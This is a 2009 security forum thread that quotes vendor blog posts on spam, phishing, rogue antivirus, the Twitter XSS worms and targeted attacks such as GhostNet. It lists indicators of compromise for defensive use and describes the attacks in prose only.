- http://www.f-secure.com/weblog/archives/00001630.html
March 19, 2009 - "...new SPAM run that's going on. It's from the same group that used Bank Of America as the lure late last week and Northern Bank on Monday. Today it's Comcast and it might actually have a higher success rate then the previous run as users always want faster broadband, especially if there's no fee involved. And the page looks really convincing. Once installed the malware does the same as in the other spam runs - steals data and sends it to Hong Kong...
Update: The spam run was just changed to a Facebook scheme.
Some subjects are:
• FaceBook message: Magnificent girl dancing video clip (Last rated by Sal Velasquez)
• FaceBook message: Dancing Girl Drunk In The Pub- facebook Video (Last rated by Abe Bain)
• FaceBook message: Hot Girl Dancing At Striptease Dance Party (Last rated by Lowell Clay)
• FaceBook message: Dancing Girl Drunk In The Pub- facebook Video (Last rated by Shane Lucas)..."
YouTube e-mail link...
- http://www.f-secure.com/weblog/archives/00001629.html
March 19, 2009 "YouTube is once again being used as a lure to spread malware. Some clown is sending out e-mails... if you follow the link, this one actually uses a Java applet (complete with a fake signature) to push a variant of Parite to the machines..."
Death exploited by hackers...
- http://www.sophos.com/blogs/gc/g/2009/03/19/natasha-richardsons-death-exploited
March 19, 2009 - "Cybercriminals don't waste any time these days jumping on the coat-tails of breaking news stories in their attempt to infect as many computer users as possible. This time it's the tragic death of award-winning English actress Natasha Richardson, who died yesterday after suffering head injuries in a skiing accident earlier in the week. It appears that hackers are stuffing webpages with keywords - most likely scraping the content off legitimate news websites - in order to lure unwary surfers into visiting their dangerous sites and infecting their computers... of course, if you do visit the malicious web link a malicious script will run on your computer... that then runs a fake anti-virus product designed to scare you into making an unwise purchase. Fake anti-virus products, also known as scareware or rogueware, are one of the fastest growing threats on the internet, and attempt to frighten you into believing that your computer has a security problem and that you should purchase a solution from the very people who have tricked you..."
(Screenshots available at each URL above.)
:fear::buried:
AplusWebMaster
2009-03-30, 03:38
FYI...
Ghostnet - targeted attacks
- http://www.f-secure.com/weblog/archives/00001637.html
March 29, 2009 - "University of Toronto published today a great research paper on targeted attacks. We've talked about targeted attacks for years. These cases usually go like this:
1. You receive a spoofed email with an attachment
2. The email appears to come from someone you know
3. The contents make sense and talk about real things (and in your language)
4. The attachment is a PDF, DOC, PPT or XLS
5. When you open up the attachment, you get a document on your screen that makes sense
6. But you also get exploited at the same time
7. The exploit drops a hidden remote access trojan, typically Grey Pigeon or Gh0st Rat variant
8. No one else got the email but you
9. You work for a government, a defense contractor or an NGO ...
But the real news is that Greg Walton & co actually managed to get an inside view of some of the servers used in these spying attacks. This means they got to see what was being done with the infected machines and where in the world they were... The release of the paper was synchronized with the New York Times article*. University of Cambridge released a related research paper at the same time as well. The Cambridge paper goes all the way to point the finger directly at the Chinese Government. Most other parties, us included, have not done such direct accusations without concrete proof of government involment... here are selected blog posts on the topic:
• Several examples of what the attack documents looked like
- http://www.f-secure.com/weblog/archives/00001406.html
• The mystery of Sergeant "nbsstt"
- http://www.f-secure.com/weblog/archives/00001449.html
• How we found the PDF generator used in some of these attacks
- http://www.f-secure.com/weblog/archives/00001450.html ..."
* http://www.nytimes.com/2009/03/29/technology/29spy.html
(Original document - scribd.com )
- http://preview.tinyurl.com/d5q3cj
Mar, 28, 2009 - "This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs..."
:fear::fear:
AplusWebMaster
2009-04-02, 22:33
FYI...
- http://www.marshal.com/TRACE/traceitem.asp?article=920&thesection=trace
April 1, 2009
"...Spam
... by the end of March 2009 the SVI (Spam Volume Index) had reached its pre-McColo level. Even so, taking a longer term view, spam volume still remains less than mid-2008. We believe successive events, including the interruption of the Atrivo/Intercage network in September, the FTC crackdown of the ‘Affking’ gang in October, the McColo shutdown in November and the subsequent demise of the Srizbi botnet, and disruption to the Bobax botnet in late 2008, have all contributed to make life more difficult for spammers...
Botnets
... a handful of botnets continue to dominate the distribution of spam. At the end of March 2009, the familiar botnets Mega-D and Rustock and Pushdo continued to dominate spam production. Xarvester is the new kid on the block, and shares quite a few similarities to its likely predecessor, Srizbi. Add a second tier of botnets, namely Donbot, Grum and Gheg, and collectively, this motley group accounts for over 70% of spam...
Malicious Spam Campaigns
... The Waledac botnet, the probable successor to Storm, has been active with a range of campaigns including President Obama, Valentines, fake coupons and bomb blast news stories. The Pushdo botnet, too, continues to pump out various malicious spam and phishing email, including fake facebook.com and classmates.com campaigns...
Malicious Web Campaigns... (Rogue AV, etc.)
The last few months has seen the resurgence of the fake anti-virus purveyors, which have been part of the scene in one form or another for the best part of 12 months. Most recently, search engine optimization, using hot Google search terms*, is being used to drive users to websites where they are prompted to download, install, and pay for this dubious ‘anti-virus’ software...."
* http://www.marshal.com/trace/traceitem.asp?article=884
:fear:
AplusWebMaster
2009-04-08, 05:21
FYI...
- http://www.f-secure.com/weblog/archives/00001649.html
April 7, 2009 @ 11:10 GMT - "We see targeted attacks and espionage with trojans regularily. Here's a typical case. A malicious Excel XLS file (md5: 3c740451ef1ea89e9f943e3760b37d3b) was emailed to a target - apprently to just one person... The exploit code creates two new DLL files to the SYSTEM32 folder ("apimgr.dll" and "netserv.dll") and executes them. These DLL files are backdoors that try to communicate back to the attackers, using these sites:
• feng.pc-officer .com
• ihe1979.3322 .org
Right now, host ihe1979.3322 .org does not resolve at all, and feng.pc-officer .com resolves to a placeholder IP (which is 63.64.63.64). The attackers can temporarily make the hostname resolve to the real IP address and then turn it back, to hide their tracks. The domain name pc-officer .com is a weird one. It has been registered already in 2006, and it has been used in targeted attacks before. See this ISC blog entry from September 2007*. Here the attack was done via a DOC files, instead of XLS. And the reporting server was ding.pc-officer .com, not feng.pc-officer .com. If you haven't read about Ghostnet** yet, now would be a good time..."
* http://isc.sans.org/diary.html?storyid=3400
** http://en.wikipedia.org/wiki/GhostNet
(Screenshot available at the F-secure URL above.)
Update: "... IP 63.64.63.64 is just a placeholder; 216.255.196.154 is the real control server. They only bring it online sporadically, trying to avoid detection.
The IP is located in Spokane, USA:
% whois 216.255.196.154
OrgName: One Eighty Networks
OrgID: OEN-1
Address: 118 N Stevens
City: Spokane
StateProv: WA
PostalCode: 99201
Country: US ..."
:fear::fear:
AplusWebMaster
2009-04-08, 14:15
FYI...
- http://securitylabs.websense.com/content/Alerts/3337.aspx
04.08.2009 - "... new SPAM campaign aimed at Match.com is being used to spread a trojan called Papras over the Internet. Match.com is an online dating service. The service reportedly has more than 15 million members and has Web sites serving 37 countries in more than 12 different languages. On April 7 2009, we received thousands of malicious emails in our email Honey Pot system. The email claims that someone wants to show the user her pictures and videos, and lures the user into visiting the Web site set up by the attacker. When the user starts the video on the Web site, they are asked to install a streaming video player which is actually a trojan with relatively low AV detection*...
(Screenshots available at the Websense URL above.)
* http://www.virustotal.com/analisis/aed50eb83aa34072d761e33959e61e1d
File ADOBE_PlayerInstallation.exe
:fear::fear:
AplusWebMaster
2009-04-08, 15:29
FYI...
IRS SPAM fakes and phish...
- http://blog.trendmicro.com/tax-season-is-phishing-season/
Apr. 7, 2009 - "As usual, the approaching tax season (April 15th is Tax Day in the US) also comes with tax-related online threats. With unemployment rates reaching record highs this year, cybercriminals have yet another opportunity to polish their social engineering techniques. Last year, spammed messages supposedly from the Internal Revenue Service (IRS) delivered malware into systems. The email messages were sternly-worded. The intention was to alarm recipients of what these same messages claimed were incomplete tax forms, which could lead to tax avoidance fraud. High-profile institutions, including Fortune 500 companies and US Defense contractors, were prominent targets of this attack. This year, cybercriminals offer their recipients ways to save money by supposedly reducing their expenses on tax preparation transactions. The recent email samples no longer purport to come from the IRS, though. They do, however, offer tax relief services for tax help-seekers. And instead of downloading malware, unknowing users are tricked into giving out personal and sensitive information to phishers... The threat does not end there. After the completing the steps... for users to supposedly have tax relief, other windows load... These are supposedly credit-related sites, but like the tax relief page they also steal sensitive and confidential user information. The spammers/phishers behind this threat have thus fashioned the attack to be both timely and seemingly relevant by exploiting the tax season as well as recession-related concerns. The IRS recently set up an information page* in response to this threat..."
* http://www.irs.gov/privacy/article/0,,id=179820,00.html
(Screenshots available at the TrendMicro URL above.)
- http://isc.sans.org/diary.html?storyid=6145
Last Updated: 2009-04-07 19:50:37 UTC - "... a few things to watch out for:
• fake e-file websites. Only use reputable companies. I did a quick check earlier and didn't see any obvious fakes on Google, but this may change at any time.
• IRS e-mails: The IRS will -never- send you an e-mail asking you to go to a website to get a refund.
• malicous tax preparation software: Don't just download the next best free tax prep software package.
• and once you are all done: Make good offline backups. If you used tax preparation software, burn a couple CDs with your files and don't forget to retain a copy of the software itself so you can read the files later. Keep a paper copy. This includes supporting electronic files like account software and spread sheets that you may use to track finances..."
:fear::fear:
AplusWebMaster
2009-04-10, 22:56
FYI...
- http://www.sophos.com/blogs/sophoslabs/v/post/3962
April 10, 2009 - "Messages posing as legitimate greeting cards with titles such as “You’ve received A Hallmark E-Card! !” have been prevalent on the Internet... Over the past months, the malicious emails have become slightly more subtle in their delivery method. While they previously included a telltale zip file as an attachment or a link to an exe, the current crop of messages masquerade as legitimate notifications with no attachments, but the links embedded in the mail point to a web page on some third party web site - which is designed to load malware... avoid opening e-cards that aren’t addressed to you, and aren’t from someone you know. The majority of the spammed e-cards do not indicate the sender or the recipient in the body, and so are easy to recognize. Legitimate e-cards tend to have this personally identifiable information included in the message body..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2009-04-12, 20:16
FYI...
Easter worm in Twitter...
- http://www.f-secure.com/weblog/archives/00001653.html
April 12, 2009 - "A cross-site scripting worm was spreading in Twitter profiles for several hours last night. People started reporting that their profile had sent Twitter messages without their knowledge... Later on the messages morphed several times... Many people followed the links to stalkdaily .com, as they believe the messages to be genuine Tweets from their friends. A cross-site script on the site then caused new users to start to Tweet the same messages... As expected, the whole worm was a publicity stunt by stalkdaily .com... You can see the latest official status of Twitter from their status page at http://status.twitter.com/ . Updated to add: This is -not- over. There's going to be quite a few modified Twitter worms for a day or two. Be careful in Twitter, don't view profiles, don't follow links... All these attacks are Javascript-based. Turn Javascript off if you're worried..."
(Screenshots available at the F-secure URL above.)
- http://status.twitter.com/post/95693986/update-on-worm
Apr 13, 2009 - "Update on worm... We are currently addressing a new manifestation of the worm attack..."
:fear:
AplusWebMaster
2009-04-13, 22:28
FYI...
- http://isc.sans.org/diary.html?storyid=6187
Last Updated: 2009-04-13 18:07:20 UTC - "... copycat Twitter XSS worms exploit the same vulnerability – actually most of the code remains the same but they obfuscated it to make analysis a bit harder. They also added couple of updates so it looks like they are exploiting other profile setting fields which the original worm didn't exploit, such as the profile link color. One thing about this copycat worm I found interesting is the type of obfuscation they used. The attackers used the [ and ] operators in JavaScript in order to reference methods in objects... It looks like the folks from Twitter are still fixing all the vulnerabilities... Use addons such as Noscript* for Mozilla ..."
* http://noscript.net/getit
- http://www.f-secure.com/weblog/archives/00001654.html
April 13, 2009
Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware
- http://ddanchev.blogspot.com/2009/04/twitter-worm-mikeyy-keywords-hijacked.html
April 15, 2009
:fear:
AplusWebMaster
2009-04-18, 03:30
FYI...
Yet another Twitter worm
- http://www.f-secure.com/weblog/archives/00001661.html
April 17, 2009 - "A new Twitter cross-site scripting worm is going around on Twitter. Just like the previous Twitter worms it talks about Mikeey... The malicious script itself is downloaded from 74.200.253.195*. Twitter is working on fixing the problem... Updated to add: Michael Mooney (Mikeey) confesses to writing this latest worm as well."
* http://centralops.net/co/DomainDossier.aspx
Queried whois.arin.net with "74.200.253.195"...
OrgName: FastServers, Inc.
OrgID: FASTS-1
Address: 175 W. Jackson Blvd
Address: Suite 1770
City: Chicago
StateProv: IL
PostalCode: 60604
Country: US ...
:fear::mad:
AplusWebMaster
2009-04-21, 14:41
FYI...
Zango: The End
- http://www.vitalsecurity.org/2009/04/zango-end.html
April 21, 2009 - "Zango Inc., the adware distributor fined $3 million by the Federal Trade Commission in 2006 for sneaking software onto people's PCs, has closed its doors after being acquired by video search engine company Blinkx PLC..."
- http://www.theregister.co.uk/2009/04/21/zango/
21 April 2009 - "... The end-game for Zango marks the end of the controversial adware business model. Other well known names in the field - including Claria (Gator), WhenU and DirectRevenue - ceased operations some time ago, leaving Zango as the last man standing."
- http://www.theregister.co.uk/2009/04/21/zango/
21 April 2009 "Updated... The adware maker was forced to pull down the shutters on its business after it was left unable to service its debts. Initially we, along with othe news outlets, incorrectly reported that video search engine firm Blinkx had acquired Zango. In fact Blinkx has only bought a proportion of its assets from administrators. "The bank foreclosed on Zango and Blinkx purchased some technical assets from the bank, including some IP and hardware, which constituted about 10 per cent of Zango's total assets," a Blinkx spokeswoman explained..."
- http://sunbeltblog.blogspot.com/2009/04/ding-dong-zango-is-dead.html
April 21, 2009
:bigthumb:
AplusWebMaster
2009-04-27, 22:14
FYI...
Spam referencing Swine flu outbreak
- http://www.sophos.com/blogs/sophoslabs/v/post/4245
April 27, 2009 - "Predictably enough, today we started to see spam taking advantage of concerns around the current Swine Flu outbreak... In the campaign seen earlier today, the purpose of the spam is meds related. Anyone clicking on the link in the message is -redirected- to an all too familiar Canadian Pharmacy site..."
(Screenshots available at the URL above.)
- http://www.us-cert.gov/current/#swine_flu_phishing_attacks_and
April 27, 2009
- http://blog.trendmicro.com/swine-flu-outbreak-hits-the-web-through-spam/
Apr. 28, 2009 - (More screenshots...)
Spamvertised Swine Flu Domains
- http://ddanchev.blogspot.com/2009/04/spamvertised-swine-flu-domains.html
April 28, 2009 - "... Swine flu spamvertised domains (long list)... Happy blacklisting/cross-checking!"
:fear:
AplusWebMaster
2009-04-30, 14:15
FYI...
Facebook phishing attack
- http://preview.tinyurl.com/crz7yq
April 29, 2009 Techcrunch.com - "... new phishing attack that has broken out on Facebook. If you get an email message that looks to be from Facebook with the subject, “Hello,” and featuring the text below, don’t bother clicking on the link included. Doing so takes you to a site called fbaction .net that mimics the look of the main Facebook login page, hoping to get you to sign in. Naturally, if you do that, the site will have access to your account and can send out more of these messages to your friends. The message body will apparently read something like this (with YOURFRIEND being replaced by the name of a friend of yours):
YOURFRIEND sent you a message.
Subject: Hello
“Visit http: //www.facebook .com/l/4253f;http ://fbaction .net/”...
... looks like “fbaction .net” is now the #2 hot trending search topic for all of Google Trends. This thing is apparently spreading quick... Facebook is now blocking outgoing links to that domain, and some browsers, like IE8, have flagged it as malicious."
(Screenshot available at the Techcrunch URL above.)
:fear::fear:
AplusWebMaster
2009-05-01, 00:56
FYI...
- http://sunbeltblog.blogspot.com/2009/04/trouble-with-search-engines-and.html
April 30, 2009 - "... Spammers saw this coming on Monday. Spam with headlines claiming that celebrities (Salma Hayek, Madonna) have caught the disease are peddling generic Tamiflu – or stealing the credit card numbers of those naïve enough to make a purchase from one of the nearly 300 newly-registered domains with a “Swine Flu” twist in their name. Cisco’s IronPort anti-spam service says Swine Flu spam is now four percent of global spam. Spam that preys on public fears generated by big news stories is now a genre... See Information week’s coverage here*."
* http://www.informationweek.com/shared/printableArticle.jhtm?articleID=217200528
:fear::mad::fear:
AplusWebMaster
2009-05-02, 23:26
FYI...
More Swine/Mexican/H1N1 related domains
- http://isc.sans.org/diary.html?storyid=6325
Last Updated: 2009-05-02 14:21:58 UTC - "... be ever vigilant in your browsing for Swine/Mexican/H1N1 flu information. We show over 1000 new domains containing those keywords registered in the last 24 hours."
Fed Reserve Spam/Malware Attack is After Your Data
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090429
29 April 2009 - "... spam campaigns that are designed to appear as if they are coming from the Federal Reserve. These attacks are not attempting to phish you and trick you into giving them banking or other personal information... They are actually looking to install an info-stealing/banking trojan on your system via drive-by exploits... it is designed to look like a message coming from the Federal Reserve with a message designed to get you to click the link from the e-mail... The bad guys behind the Federal Reserve malware use the LuckySploit exploit pack. LuckySploit has a variety of exploits... Successful exploitation tends to drop a file named wQJs.exe onto the system in the user's Temp folder. It may also drop a file named svchost.exe (same name as a legitimate Windows file) onto the system as well. This "svchost.exe" and "wQJs.exe" are the same file. They both create shell32.dll and 123.info in the user's Temp directory as well. Note that 123.info is just a text file that contains the path to the malware.
Malware Details:
File Name: wJQs.exe | svchost.exe
File Size: 9216 bytes
MD5 hash: 175ef7faf41ecbe757bcd3021311f315
File Name: shell32.dll
File Size: 6144 bytes
MD5 hash: 3182da0a9c6946e226ee6589447af170
VirusTotal Results for these files can be viewed below:
.exe: http://www.virustotal.com/analisis/a4f6ce98cb24ca1640d7f86ceb6181f1
.dll: http://www.virustotal.com/analisis/d6ba4efea309d3993c6215bf41a64f7c ..."
(Screenshot and more detail available at the Shadowserver URL above.)
:fear::mad::fear:
AplusWebMaster
2009-05-04, 13:46
FYI...
IFrame redirects lead to MBR rootkit
- http://blog.trendmicro.com/porn-sites-lead-to-mbr-rootkit/
May 3, 2009 - "Websites related to pornography that appear to be compromised were found by Trend Micro engineers loading malicious JavaScript which redirects users onto malicious domains that ultimately lead to the download of an MBR rootkit (TROJ_SNOWAL.A) onto the affected system... malicious scripts all follow a similar routine: upon execution, it checks for the date on the target system then generates a URL based on the date obtained. It then creates an IFrame, which would redirect the user to the generated URL. The URL then leads to the download of a malicious file, which in turn downloads an MBR rootkit..."
(Screenshot and more detail available at the URL above.)
:fear::spider::fear:
AplusWebMaster
2009-05-04, 19:21
FYI...
Facebook phishing malware
- http://isc.sans.org/diary.html?storyid=6328
Last Updated: 2009-05-04 14:47:00 UTC - "Looks like there may be a piece of malware out there is sending out messages to folks on Facebook trying to trick them into visiting a facsimile "Facebook" login page to steal credentials. The phishing site is currently on "junglemix .in," so you may want to block that site. More details as we figure this thing out..."
:fear::mad::fear:
AplusWebMaster
2009-05-05, 04:34
FYI...
H1N1 Domains
- http://www.f-secure.com/weblog/archives/00001674.html
May 4, 2009 - "... here is a list of domains* registered over the weekend using the words swine flu. There are 1,344 on the list. Again, so far, none of the domains we've checked are hosting any malicious files. In fact, the only malicious file we've seen is something that Symantec posted** about last week. It's a PDF "Swine Flu FAQ" exploit which drops a password stealer and then opens a clean PDF file as a decoy. One interesting thing about the exploit that hasn't been mentioned yet is the file name, The Association of Tibetan journalists Press Release.pdf. Tibet themed exploits are very popular with targeted attacks***."
* http://www.f-secure.com/weblog/archives/swineflu_domains_may_4th_2009.txt
** https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/268
*** http://www.f-secure.com/weblog/archives/00001672.html
:fear:
AplusWebMaster
2009-05-06, 13:11
FYI...
Waledac Turns to Cash and Vaccines w/SPAM
- http://blog.trendmicro.com/waledac-turns-to-cash-and-vaccines/
May 5, 2009 - "Riding on the ongoing global economic recession, Waledac updates its SPAM messages with email subjects related to earning a fortune through Google cash. Other spam email subjects we’ve seen so far:
* Be your own boss with Google
* Earn cash using Google today
* Google System that really works
* Make a fortune online
* Make thousands a month from home
* Start your home business today
* Use Google to earn extra cash
As of this writing, the hyperlink found in the email body redirects to an advertising link which currently returns a redirect loop error in Firefox web browser. Another current event seen leveraged on by this wave of Waledac spam runs is the swine flu outbreak, as spammed messages bear subjects that seem related to a vaccine for swine flu. Other spam email subjects seen so far:
* Anti-swine flu drugs are available here
* Anti-viral treatment for swine flu
* Are you worried about swine flu?
* Are you worried about swine flu? buy medicine!
* Be quick! anti-swine flu drugs are almost sold out
* Buy medicine that prevent you from getting swine flu
* Buy medicine to prevent swine flu
* Buy new effective medicine against swine flu
* Buy the most effective treatment for combating the new swine flu
* Do you want to prevent yourself from swine flu?
* Do you want to protect yorself against swine flu?
* Dont stand in line for swine flu medicine
* Get swine flu medicine here
* Get the swine flu medicine right here
* Hurry up! swine flu drugs are almost sold out
* Keep your family from getting swine flu
* New medicine to prevent swine flu
* New vaccine helps to prevent swine flu
* New vaccine to prevent swine flu
* Order anti-swine flu medicine today
* Order new medicine against swine flu
* Order now vaccine against swine flu
* Prevent infections with swine flu viruses
* Prevent yourself from cathcing swine flu
* Protect your family against swine flu!
* Protect yourself from swine flu
* Stop risk of being killed by swine flu!
* The vaccine protecting against swine flu
* You can buy swine flu drugs here
* You can order anti-flu drugs treaing swine flu here
* You can order anti-swine flu drugs on-line
* You can protect yourself against swine flu!
The given link however only leads to the all too familiar Canadian pharmacy site..."
(Screenshots available at the TrendMicro URL above.)
:fear::fear:
AplusWebMaster
2009-05-20, 19:19
FYI...
eBay phishing Scam...
- http://www.sophos.com/blogs/sophoslabs/v/post/4452
May 20, 2009 - "... eBay phishing scam came in the form of a seemingly innocent query about the sale of iPhones. The scam message is quite simple... At first sight, it appears to be a product spam campaign to promote the iPhone. However, when clicking the link that came with the attached email, a -fake- eBay page comes up. This email is actually a ruse designed to steal an eBay user’s information...
SophosLabs analysts have encountered many instances of such misdirection of legitimate websites. They range from internet banking websites to online retail websites. As always, online users should take precautions and never attempt to follow an embedded weblink to an online store or a banking website from an email, even if by first appearances, it looks legitimate..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-05-22, 17:30
FYI...
Malicious iFrame on Gadgetadvisor.com
- http://www.f-secure.com/weblog/archives/00001687.html
May 22, 2009 - "Are you a gadget geek? Do you often seek advice from Gadget Advisor before making a purchase? Our Web Security Analyst discovered a malicious IFrame on the popular tech website that redirects visitors to a malicious website... If the site detects a PDF browser plugin for Adobe Acrobat and Reader, it loads a specially-crafted malicious PDF file that exploits a stack-based buffer overflow vulnerability ( http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2992 ). The net effect of the attack is to plant a trojan, detected as Trojan-Downloader.Win32.Agent.brxr, on vulnerable systems by calling the util.printf JavaScript function, which connects back to the malicious website in order to download the trojan to the machine. A remote attacker can access the user's machine once it has been infected with the trojan... This attacks is targeted against older, unpatched version of Adobe programs, as the latest Adobe updates have already fixed this problem. More information and the updates can be found at Abobe at:
http://www.adobe.com/support/security/bulletins/apsb08-19.html. Disabling the JavaScript function in Acrobat and Reader will also prevent the threat from proceeding."
(Screenshot available at the F-secure URL above.)
:fear::mad:
AplusWebMaster
2009-05-25, 13:43
FYI...
Facebook phishing/spam/"worm" ...
- http://isc.sans.org/diary.html?storyid=6451
Last Updated: 2009-05-25 07:16:47 UTC ... (Version: 5) - "... new Facebook phising/spam/"worm" campaign is doing the rounds. It uses Belgium domains (.be) to impersonate the Facebook login page and steal the user credentials.
UPDATE 4: The malicious domains do not only impersonate Facebook but contain malicious "hidden" (1x1pixel) iframes, hosted on the same host, such as: "/tds/r.php?sid=2&pid=5511". Do not browse them...
UPDATE 3: As expected, more domains are coming (and some of them are still active right now - May 25, 0:00am CET)...:
• redfriend dot be, redbuddy dot be, picoband dot be, areps dot at, greenbuddy dot be
• picoband dot be, vispace dot be, whiteflash dot be, bestspace dot be
• There are other "more than suspicious" .be domains associated to the same IP address.
The ones active do resolve to IP address 211.95.78.98. From APNIC...
country: CN ..."
- http://www.f-secure.com/weblog/archives/00001689.html
May 25, 2009
:fear::mad::fear:
AplusWebMaster
2009-05-26, 14:41
FYI...
Facebook phishing using Belgium (.be) domains (cont'd)
- http://isc.sans.org/diary.html?storyid=6451
Last Updated: 2009-05-25 20:01:20 UTC ...(Version: 6)
"UPDATE 5: (May 25, 22:00h CET) It seems there is a new variation moving around, using tinyurl links... For example, you get a Facebook message pointing to "tinyurl dot com /o5kblj/" that takes you to a link at "simplemart dot be".
> Remember you can enable/disable the tinyurl preview feature through
" http://tinyurl.com/preview.php ". You just need to enable cookies on your browser.
Some of the malicious domains being used are redfriend dot be, redbuddy dot be, picoband dot be... (at this point, none of them can be resolved)..."
:fear::fear:
AplusWebMaster
2009-05-27, 17:07
More on same...
Koobface... again
- http://securitylabs.websense.com/content/Alerts/3403.aspx
05.26.2009 - "... Koobface attempted another running campaign on Facebook. If infected, Facebook users start to spam their friends with a link to a malicious Web site. When users visit the link, they are redirected various malicious and phishing pages. We detected these on numerous .be domains and TinyURL links. One such malicious page is a fake YouTube page that appears to be a funny video. The page tells visitors to to upgrade their Flash player in order to play the video, and the Flash setup program is actually Koobface malware... Among other things, a proxy server is installed on the infected computer..."
(Screenshots available at the Websense URL above.)
:fear: :mad:
AplusWebMaster
2009-06-02, 00:22
FYI...
Another "Digital Certificate" malware campaign
- http://isc.sans.org/diary.html?storyid=6499
Last Updated: 2009-06-01 16:21:12 UTC - "... a "Bank of America Digital Certificate Updating" scheme is used, where a victim of the luring email is directed to a fake website... Using the <Update Certificate> button here will net you a piece of Malware that has approximately 30% AV coverage (as indicated by VirusTotal). A quick analysis of said malware shows probable signs of, suprise-suprise, Waledac..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2009-06-02, 08:24
FYI...
- http://www.theregister.co.uk/2009/06/02/twitter_malware_scam/
2 June 2009 - "Twitter users over the weekend were the target of a scam that tried to infect them with rogue anti-virus software and other malware, in what is one of the first times the micro-blogging site has been hit by a known for-profit attack, a security researcher said. The problem started after a flurry of tweets directed users to a website promising "Best Video." The site appeared to offer content from YouTube, but behind the scenes, the site delivered a PDF document designed to infect those using vulnerable versions of Adobe's Reader program. Victims then received an urgent warning that their systems were infected and needed to cleaned using fraudulent security software... The scam promoted a piece of rogue anti-virus software dubbed System Security."
- http://www.viruslist.com/en/weblog?weblogid=208187734
June 01, 2009 - "... fake program called "System Security" is being promoted... Most likely the cyber criminals behind this attack simply used the stolen credentials of those phished accounts to tweet the messages... If the trends we've seen on other social platforms are any indicator for Twitter then we can only expect an increase in attacks."
(Screenshots available at the URL above.)
- http://pandalabs.pandasecurity.com/archive/Visualizing-the-Twitter-Trends-Attack.aspx
11 June 09 - "... cyber criminals have been targeting Twitter users by creating thousands of messages (tweets) embedded with words involving trending topics and malicious URLs. If the URLs were accessed, the victims would arrive at a rogueware website designed to trick them into thinking that their computer is infected, therefore justifying the need to purchase the fake software offered. Since the initial discovery, we have been keeping a close eye on this attack, but the malicious tweets continue... The ease of carrying out this type of attack leaves us to believe that this will not go away anytime soon... "
:fear::mad:
AplusWebMaster
2009-06-09, 09:08
FYI...
- http://www.marshal8e6.com/trace/i/FTC-Shuts-Down-Rogue-ISP,trace.1003~.asp
June 8, 2009 - "Last week the US Federal Trace Commission shut down a rogue ISP because it hosted a range of botnet command and control servers, malware, and child pornography. The ISP, known as 3FN (also as APS Telecom) was thought to be responsible for a number of spam botnet control servers, notably Pushdo/Cutwail... did this shutdown have any impact on spam? Looking at our Spam Statistics from last week, we do see a dip down of about 15% in our Spam Volume Index (SVI)... And spam originating from the Pushdo botnet indeed seems to be affected. The proportion of spam from Pushdo has dipped, along with Mega-D. Rustock seems completely unaffected... spam from Pushdo is still coming in to our spam traps, but at a much reduced rate... In terms of its impact on spam, the event is not quite in the same league as the McColo shutdown last November when spam output was halved overnight, but it is still very welcome nonetheless..."
(Charts available at the URL above.)
:spider:
AplusWebMaster
2009-06-09, 15:51
FYI...
More Blackhat SEO "scareware" campaigns
- http://ddanchev.blogspot.com/2009/06/fake-web-hosting-provider-front-end-to.html
June 08, 2009 - "... they've got no customers but the cybercriminals themselves maintaining a portfolio of over 7,000 adult related keywords which they have been using for blackhat SEO campaigns across thousands of automatically registered - CAPTCHA recognition outsourced - Blogspot accounts since February, 2009... Not only is life4info .info or dirsite .com a bogus free hosting provider, but the campaigns hosted by them are interacting with our "dear friends" at AS30407; VELCOM .com which Spamhaus describes as "N. American base of Ukrainian cybercrime spammers" - and with a reason."
(Screenshots and more detail available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-06-11, 20:10
FYI...
Malicious SPAM - Air France plane crash
- http://securitylabs.websense.com/content/Alerts/3417.aspx
06.11.2009 - "Websense... has detected a new malicious spam campaign pretending to deliver legitimate news updates about the Air France plane crash ( http://news.bbc.co.uk/1/hi/world/americas/8078147.stm ). The spam campaign is in Portuguese, and includes a link to view the first videos from the crash site. The link to the video leads to a Trojan Downloader file named: Video_AirFrance_447.com. If a user runs the file, it downloads a malicious executable file masquerading as an image from [removed].org/imgs/like2.jpg. The malware registers a password-stealing BHO component on the system masquerading as a McAfee SiteAdvisor component with this GUID: {9387b8b2-5508-11de-8729-c56f55d89593}. The GUID is linked to the malicious installed DLL file named mcieplg.dll under the system32 directory (%windir%\system32\mcieplg.dll). AV detection rates on this file are very low*..."
* http://www.virustotal.com/analisis/c57a0a4f2a45eefe9cd8e41a0f64c3da9fabb33dd6043ddf82a2550654916914-1244673584
(Screenshots available at the Websense URL above.)
:fear::mad:
AplusWebMaster
2009-06-13, 21:25
FYI...
- https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/276
06-12-2009 - "... SPAM (message) noted that Symantec was working with Microsoft to create a patch for "Conflicker." According to the spam message, Conficker is also called "Troj/Brisv.A"... The spam is accompanied by a file named "remtool_conf.exe." The spammers have taken an extra step ahead of just spreading their Trojans. This file is actually a Symantec fixtool for Trojan.Brisv bundled with the Trojan. So, when someone runs this file they actually run the Symantec Brisv fixtool, along with the Trojan completing its task. In this case, the dropped Trojan contacts a remote site in order to download another piece of malware, which is currently detected by Symantec products as Suspicious.MH690.A... We gave the infection a run on a test machine. Almost immediately we saw our own EULA... Running the email attachment did a few things–it dropped the original (signed) Symantec Trojan.Brisv fixtool into a temporary folder; it dropped a Trojan into the same folder; and, it ran the original fixtool. One can see that this is indeed Symantec’s own legitimate fixtool. But, the Trojan file "webexplorer.exe" is basically a downloader. It contacts a remote site in order to download another file called "winupdate.exe". As you’ve guessed, that is also a Trojan and is currently detected as Suspicious.MH690.A... If you have a need to run a Symantec fixtool, go to the Symantec website* and download it for free..."
* http://www.symantec.com/business/security_response/removaltools.jsp
(Screenshots available at the first Symantec URL above.)
:fear::mad::fear:
AplusWebMaster
2009-06-15, 23:24
FYI...
- https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/spam/article-id/200
